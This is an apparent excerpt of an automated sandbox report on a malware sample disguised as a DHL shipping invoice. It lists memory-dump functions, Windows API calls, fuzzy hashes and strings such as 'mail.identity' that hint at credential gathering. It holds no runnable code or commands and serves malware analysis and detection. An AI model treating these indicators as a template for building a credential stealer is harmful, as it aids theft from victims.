                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$memset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1860491036-0
                                                                                                                                                                                                                                      • Opcode ID: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                      • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d3be79d398e0043749495dd296c093f7ddeccd389f7318e4c6f9d3722586f48
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                      • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$memcpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 368790112-0
                                                                                                                                                                                                                                      • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                                      • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                                                                      • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset
                                                                                                                                                                                                                                      • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                                                                      • API String ID: 2221118986-515162456
                                                                                                                                                                                                                                      • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                                      • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                        • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3503910906-0
                                                                                                                                                                                                                                      • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                                      • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                                                      • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                                                      • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3798638045-0
                                                                                                                                                                                                                                      • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                                                                      • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                                                                                                                                        • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                                                      • atoi.MSVCRT(?,00000000,?,757C0A60,?,00000000), ref: 0040B619
                                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                                                      • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4107816708-0
                                                                                                                                                                                                                                      • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                                                                      • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strlen
                                                                                                                                                                                                                                      • String ID: >$>$>
                                                                                                                                                                                                                                      • API String ID: 39653677-3911187716
                                                                                                                                                                                                                                      • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                                                                      • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                                      • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi
                                                                                                                                                                                                                                      • String ID: C@$mail.identity
                                                                                                                                                                                                                                      • API String ID: 1439213657-721921413
                                                                                                                                                                                                                                      • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                                                                      • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                        • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                      • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                                                      • String ID: Ul@
                                                                                                                                                                                                                                      • API String ID: 270934217-715280498
                                                                                                                                                                                                                                      • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                                      • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,757C0A60), ref: 00408EBE
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,757C0A60), ref: 00408E31
                                                                                                                                                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 203655857-0
                                                                                                                                                                                                                                      • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                                                                      • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _ultoasprintf
                                                                                                                                                                                                                                      • String ID: %s %s %s
                                                                                                                                                                                                                                      • API String ID: 432394123-3850900253
                                                                                                                                                                                                                                      • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                                                                      • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                                                        • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                                      • String ID: menu_%d
                                                                                                                                                                                                                                      • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                                      • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                                      • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _msizerealloc
                                                                                                                                                                                                                                      • String ID: failed memory resize %u to %u bytes
                                                                                                                                                                                                                                      • API String ID: 2713192863-2134078882
                                                                                                                                                                                                                                      • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                                      • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                                                                                                                                                      • strrchr.MSVCRT ref: 00409808
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040981D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
